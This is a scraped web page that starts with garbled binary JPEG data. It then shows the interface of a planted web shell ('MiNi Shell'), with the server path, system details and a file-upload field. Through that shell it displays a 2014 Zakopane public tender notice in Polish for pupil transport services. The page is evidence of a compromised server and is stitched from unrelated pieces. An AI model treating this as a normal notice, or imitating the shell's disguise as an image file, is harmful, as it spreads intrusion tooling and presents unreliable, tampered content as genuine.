JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140717/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140717/155805-N-2014.html

<p class="kh_header"><b>Zakopane: BZP.271.61.2014 świadczenie  usługi polegającej na dowozie i opiece uczniów na terenie miasta Zakopane do szkół w roku szkolnym 2014/2015</b><br>
<b>Numer ogłoszenia: 155805 - 2014; data zamieszczenia: 17.07.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasta Zakopane , ul. T. Kościuszki 13, 34-500 Zakopane, woj. małopolskie, tel. 018 2020448, faks 018 2020448.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zakopane.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> BZP.271.61.2014 świadczenie  usługi polegającej na dowozie i opiece uczniów na terenie miasta Zakopane do szkół w roku szkolnym 2014/2015.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem  zamówienia jest  świadczenie  usługi polegającej na dowozie i opiece uczniów na terenie miasta Zakopane do szkół w roku szkolnym 2014/2015


Zakres zamówienia obejmuje : 


Zadanie  I. 
Usługa dowozu i opieki  uczniów zamieszkałych w rejonie Krzeptówek do Gimnazjum nr 1, ul. Nowotarska 42 i z powrotem, tj. z Gimnazjum nr 1 na Krzeptówki - przewidywana ilość   uczniów - 17 

Zadanie  II.

Usługa dowozu i opieki  uczniów zamieszkałych w rejonie Gubałówki do Szkoły Podstawowej nr 2 i z powrotem, tj. z SP nr 2 na Gubałówkę - przewidywana ilość  uczniów-36 

 UWAGA!!!    Na tej trasie występuje ograniczenie rzeczywistej masy pojazdów do 5 ton.  Jeżeli przewóz będzie się odbywał przez Kościelisko, koniecznym jest aby pojazd dojeżdżał do Furmanowej I.

Zadanie III. 
Usługa dowozu i opieki  uczniów zamieszkałych w rejonie Gubałówki do Gimnazjum nr 1 oraz Szkoły Podstawowej nr 5 i z powrotem, tj. z w/w szkół na Gubałówkę - przewidywana ilość  uczniów -33 

Uwaga!!! Na tej trasie występuje ograniczenie rzeczywistej masy pojazdów do 5 ton. Jeżeli przewóz będzie się odbywał od strony Zębu, koniecznym jest aby pojazd dojeżdżał Gubałówka Kaplica.


UWAGA!! Przy w w zadaniach przystanki początkowe i końcowe będą ustalone w miarę potrzeb uczniów

 Zamawiający informuje ,że podana liczba uczniów na danej trasie  może  ulec zmianie


Opiekę  podczas przewozu uczniów zapewnia wykonawca ,  w każdym pojeździe wykonawca zobowiązany jest  zapewnić  opiekuna podczas  przewozu  uczniów -- wymagana jest osoba pełnoletnia:
- przeciwko, której nie toczy się postępowanie karne, postępowanie dyscyplinarne lub  
  postępowanie o ubezwłasnowolnienie
- nie była skazana prawomocnym wyrokiem za umyślne przestępstwo,
- zna podstawy udzielania pierwszej pomocy 

 Zamawiający zastrzega  ,że kierowca nie może pełnić  jednocześnie roli kierowcy i opiekuna .

       Wykonawca w trakcie świadczenia usług objętych postępowaniem zobowiązany jest do przestrzegania przepisów określonych w Rozporządzeniu Ministra  Transportu, Budownictwa i Gospodarki Morskiej  z dnia 21 grudnia 2012 roku  zmieniające  rozporządzenie w sprawie warunków technicznych pojazdów oraz zakresu ich niezbędnego wyposażenia (Dz.U. Nr  30 z 2013 r. )    
Usługi objęte  zamówieniem mają być  świadczone środkami transportu przystosowanymi do przewozu młodzieży szkolnej spełniającymi wszystkie wymogi bezpieczeństwa  związane z przewozem pasażerskim o którym mowa w ustawie z dnia 6 września 2001 r. o transporcie drogowym (t.j. Dz. U. z 2013 r. poz. 1414 z późn. zm.)oraz przez    osoby mające odpowiednie uprawnienia do świadczenia tych usług. 

Wykonawca  ma  zapewnić odpowiednią liczbę miejsc siedzących ( jako miejsca siedzące należy uwzględnić ilość  uczniów podaną przez zamawiającego plus miejsce siedzące dla opiekuna i dla kierowcy)  do wymagań danej trasy. 
 W przypadku awarii środka transportowego Wykonawca zapewni zastępczy środek transportu, w taki sposób aby nie powodować opóźnień czasowych kursu i nie powodować nadmiernego (ponad limit miejsc siedzących) zwiększenia liczby przewożonych uczniów. Wykonawca ponosi pełną odpowiedzialność za bezpieczeństwo przewożonych uczniów

W pojeździe  w czasie przewozu  nie może być większa liczba  osób  niż dopuszczalna, określona w dowodzie rejestracyjnym 
Wykonawca musi zapewnić przewożonym uczniom oraz opiekunom  odpowiednie warunki bezpieczeństwa i higieny tj: 
a/ utrzymywać w czystości i porządku  pojazdy
b/ przestrzegać przepisy P.Poż. i BHP 
c/ ubezpieczyć  pojazdy  i  uczniów  oraz kierowcę i opiekunów  na czas przewozu z tytułu szkody, które mogą wyniknąć w związku z wykonywaniem zamówienia
         d/ oznaczyć  pojazd na czas przewozu -że wykorzystywany jest do transportu dzieci                 
               szkolnych.


 Usługi przewozowe   - dowozy uczniów do przedmiotowych placówek oświatowych w Gminie  Miasta Zakopane  będą realizowane w godzinach ustalonych przez dyrektorów szkół wyłącznie w dni nauki szkolnej tj. z wyjątkiem sobót, świąt i innych dni ustawowo wolnych od pracy a także przerw w realizacji zajęć dydaktyczno - wychowawczych, określonych na podstawie przepisów rozporządzenia Ministra Edukacji Narodowej i Sportu z dnia18 kwietnia 2002r. w sprawie organizacji roku szkolnego (Dz. U.  z 2002r. Nr 46, poz.. 432, z późn. zm.) 

     W przypadku odrabiania zajęć szkolnych w placówce w dniu, kiedy wykonawca nie będzie świadczył usługi i odwołania zajęć w dniu objętym niniejszym zamówieniem , dyrektor placówki pisemnie powiadomi o odwołaniu i odrabianiu zajęć na 3 dni wcześniej. Wykonawca zobowiązany jest we wskazanym dniu do wykonania usługi. 


      Wykonawca z którym zostanie podpisana umowa ,ustali optymalny rozkład jazdy, mając na uwadze jak najkrótszy czas przebywania  młodzieży szkolnej  w podróży, z uwzględnieniem ,że młodzież  ma  być dowieziona do szkoły w takim czasie, aby możliwe było terminowe rozpoczęcie przez nią zajęć lekcyjnych .Rozkład jazdy musi być dostosowany do obowiązującego w danej placówce szkolnej  harmonogramu -planu zajęć.

Dane osób sprawujących opiekę (imię  i nazwisko opiekuna oraz numer jego telefonu komórkowego) oraz ich  pisemne oświadczenia iż:     
1)	przeciwko nim nie toczy się postępowanie karne, postępowanie dyscyplinarne lub postępowanie o ubezwłasnowolnienie,
2)	nie była skazana prawomocnym wyrokiem za umyślne przestępstwo,
3)	zna podstawy udzielania pierwszej pomocy.   

 wykonawca   przekaże   zamawiającemu  -Naczelnikowi  Wydziału Edukacji Turystyki i Sportu  Urzędu Miasta Zakopane nie później niż do 5 września 2014 roku, 
 
Szczegółowy   harmonogram   przewozu   młodzieży    wykonawca   przekaże   zamawiającemu  -Naczelnikowi  Wydziału Edukacji Turystyki i Sportu  Urzędu Miasta Zakopane  w  nieprzekraczalnym  terminie  do 30 dni od rozpoczęcia świadczenia usługi będącej przedmiotem zamówienia, po  dokonaniu   uzgodnień   z   dyrektorami   poszczególnych   szkół,   do których uczęszcza młodzież  objęta dowozem.

 Harmonogram dowozu dzieci musi zawierać:
1)  opis   trasy dojazdu do szkoły i z powrotem
2)  szczegółowe godziny kursów 
   
W przypadku zmiany organizacji zajęć szkolnych  polegającej na skróceniu godzin nauki (np. rekolekcje, święto szkoły itp. uroczystości),wykonawca zostanie  niezwłocznie powiadomiony  przez Dyrektora szkoły   o zmianie terminu dowozu  i odwozu uczniów

Do obowiązków osoby sprawującej opiekę nad uczniami będzie należało: 
1)sprawdzenie stanu liczbowego uczniów wewnątrz pojazdu,
2) pilnowanie ładu i porządku przy wsiadaniu i zajmowaniu przez uczniów miejsc w pojeździe.
3)zwracanie uwagi na właściwe zachowanie się uczniów w czasie przewozu,
4)zapewnienie bezpiecznego wsiadania i wysiadania z pojazdu
5) przeprowadzenie uczniów przez jezdnię do budynku szkoły i odbiór uczniów ze szkoły do 
     autobusu

W celu realizacji umowy, Wykonawca zobowiązany jest uzyskać od Burmistrza Miasta Zakopane lub Starosty Tatrzańskiego zezwolenia na wykonywanie przewozów regularnych specjalnych,

Zamawiający wymaga aby wykonawca wskazał w swojej ofercie  konkretny pojazd/-y, którym będzie regularnie świadczył usługę. W przypadku świadczenia usługi innym pojazdem w okresie letnim, a innym w okresie zimowym - należy rozróżnić pojazd do obsługi w lecie i pojazd do obsługi w warunkach zimowych. W przypadku użycia pojazdu zastępczego obowiązuje pisemne zgłaszanie (lub np. telefonicznie i następnie przesłanie pisma faxem) konkretnych okresów (dni lub kursów) wykonywanych pojazdem zastępczym,

W razie wystąpienia przejściowych okoliczności uniemożliwiających świadczenie usług Wykonawca we własnym zakresie, na własny koszt zapewni pojazdy zastępcze                       o parametrach nie gorszych niż  wykazane w ofercie  samochody oraz osoby, które w jego imieniu i za pisemną zgodą Zamawiającego  będą świadczyć usługi,

 Wykonawca zobowiązany jest przy doborze pojazdów do  świadczenia usług zwłaszcza dla  zadania nr II i nr III  uwzględnić fakt występowania ograniczenia rzeczywistej masy pojazdów do 5 ton (znak B-18 - 5t) oraz trudne warunki drogowe związane z górzystą rzeźbą terenu i   silnymi opadami atmosferycznymi.

Zamawiający informuje, że w okresie świadczenia przez wykonawcę usług,  jest upoważniony do kontroli, włącznie ze stanem i wyposażeniem pojazdu..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 26.06.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Każdy Wykonawca jest zobowiązany wnieść wadium przetargowe w wysokości  :
dla zadania I -     500,00 zł ( słownie; pięćset złotych) 
dla zadania II-    1500,00 zł ( słownie: jeden  tysiąc pięćset  złotych) 
dla  zadania III - 1500,00 zł ( słownie: jeden  tysiąc pięćset  złotych)
2)Wadium może być wnoszone w jednej lub w kilku  następujących formach: 
         -  pieniądzu;
- poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-
   kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym;
- gwarancjach bankowych;
          - gwarancjach ubezpieczeniowych;
 - poręczeniach udzielanych przez podmioty, o których mowa w art. 6 lit. b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. z 2007r. Nr 42 poz. 275 z późn. zm.) 
3)	Wadium przetargowe w  pieniądzu należy wnieść  przelewem na konto 
Urzędu Miasta Zakopane w PEKAO S.A. w Zakopanem 
nr: 85 1240 4748 1111 0000 4871 8666
4)	Wadium powinno znajdować się na koncie Zamawiającego najpóźniej w terminie składania ofert tj. 28 lipca 2014 r. do godz.  12°°
5)	Wadium wnoszone w pozostałych formach należy złożyć w postaci oryginału, najpóźniej w terminie składania ofert tj. 28 lipca  2014 r. 
do godz. 12°° w  Biurze ds. zamówień publicznych pok. nr 8 lub 7 (parter budynku Urzędu Miasta Zakopane ul. Kościuszki 13 ).

UWAGA!!! Nie wolno oryginałów tych dokumentów wkładać do oferty. 

6)	Zwrot wadium - Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana 
jako najkorzystniejsza, z zastrzeżeniem, że Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, 
o którym mowa w art. 26 ust. 3 ustawy nie złożył dokumentów 
lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie. 
7)	Zamawiający zwraca niezwłocznie wadium na wniosek Wykonawcy,
który wycofał ofertę przed upływem terminu składania ofert.
8)	Zamawiający żąda ponownego wniesienia wadium przez Wykonawcę, którym zwrócono wadium na podstawie ust.1, jeżeli w wyniku ostatecznego  rozstrzygnięcia protestu jego oferta została wybrana jako najkorzystniejsza. 
9)	Wykonawca wnosi wadium w terminie określonym przez Zamawiającego.
10)	Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz 
z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego 
oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.
11)	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
- odmówił podpisania umowy w sprawie zamówienia publicznego 
na warunkach określonych w ofercie;
-   zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli wykonawca   wykaże ,że  posiadał aktualną     licencję   zezwalającą   na   wykonywanie   krajowego transportu drogowego osób obejmującej co najmniej obszar powiatu tatrzańskiego  ,zgodnie z  ustawą z dnia 6 września 2001 r. o transporcie drogowym (t.j. Dz. U. z 2013 r. poz. 1414 z późn. zm.) 

             Ocena spełnienia powyższego  warunku  będzie dokonywana w oparciu o wymagane 
             dokumenty i oświadczenia dołączone do oferty .</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Warunek zostanie uznany za spełniony jeżeli wykonawca złoży stosowne oświadczenie o spełnianiu warunków udziału w postępowaniu 

Ocena spełnienia powyższego  warunku  będzie dokonana w oparciu o wymagane dokumenty i oświadczenia dołączone do oferty</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli wykonawca  wykaże się dla zadania zadań na które składa ofertę dysponowaniem pojazdem posiadającym aktualne badania techniczne  o wymaganej liczbie miejsc siedzących  tj. dla uczniów, opiekuna i kierowcy. 
Przy doborze pojazdów do obsługi zadania nr II i nr III należy uwzględnić fakt występowania ograniczenia rzeczywistej masy pojazdów do 5 ton (znak B-18 - 5t).


Ocena spełnienia powyższego  warunku  będzie dokonana , w oparciu o wymagane dokumenty i oświadczenia dołączone do oferty</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony ,jeżeli  wykonawca wykaże  że do świadczenia usług  dysponuje  pełnoletnimi opiekunami w zakresie danego zadania w ilości zgodnej z ilością samochodów jakimi będzie świadczona usługa i   kierowcami  w ilości zapewniającej obsługę w zakresie danego zadania  zgodnie  z ustawą z dnia 20 czerwca 1997 r. - Prawo o ruchu drogowym (Dz.U z 2012 r. poz. 1137 z późn. zm) określającą  wymagania w stosunku do kierowców. 


Ocena spełnienia powyższego  warunku  będzie dokonana w oparciu o wymagane dokumenty i oświadczenia dołączone do oferty .</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Warunek zostanie uznany za spełniony jeżeli wykonawca złoży stosowne oświadczenie o spełnianiu warunków udziału w postępowaniu 

Ocena spełnienia powyższego  warunku  będzie dokonana w oparciu o wymagane dokumenty i oświadczenia dołączone do oferty</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Wykonawca ma do oferty załączyć :
1)	poświadczoną przez  wykonawcę  za zgodność z oryginałem, kserokopia dowodu rejestracyjnego pojazdu, którym będzie świadczona usługa danego zadania

2)	poświadczoną przez wykonawcę za zgodność z oryginałem, kserokopia prawa jazdy  dla wskazanego w ofercie kierowcy   dla danego zadania.</p></li>



</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W oparciu o art.144 ust.1 ustawy zamawiający informuje, że przewiduje możliwość zmiany umowy w następujących przypadkach: 

-ustawowych zmian stawek podatku VAT w  trakcie obowiązywania umowy  -zamawiający  dopuszcza zmianę cen wyłącznie w przypadku ustawowej zmiany stawki podatku VAT, przy czym zmianie ulegną  wyłącznie  ceny    jednostkowe  brutto za 1 dzien świadczenia usług  podane  w druku oferty ceny   netto pozostaną   bez zmian.
przedłużenia terminu wykonania zamówienia z uwagi na długotrwałe  ciągłe ( co najmniej 3 
- w przypadku zdarzeń losowych takich jak: choroba, śmierć , rezygnacji ze  świadczenia usługi, utraty uprawnień i.t.p- zmiany osób ( kierowca/ opiekun)  wykazanych w ofercie  na inne legitymujące się, co najmniej równoważonymi uprawnieniami, 
-zmian  pojazdów jakie zostały wykazane do realizacji zamówienia w przypadku zdarzeń losowych niezależnych od wykonawcy typu awaria pojazdu uniemożliwiająca świadczenie usług zgodnie z wymaganiami zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zakopane.eu pod linkiem Zamówienia  publiczne postępowania poniżej  wartości  art.11.8<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wydział Edukacji Turystyki i Sportu pok. 218
Urząd Miasta Zakopane
ul. Kościuszki 13
34-500 Zakopane.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.07.2014 godzina 12:00, miejsce: Biuro ds zamówień publicznych pok. 8
Urząd Miasta Zakopane
ul. Kościuszki 13
34-500 Zakopane.</p>
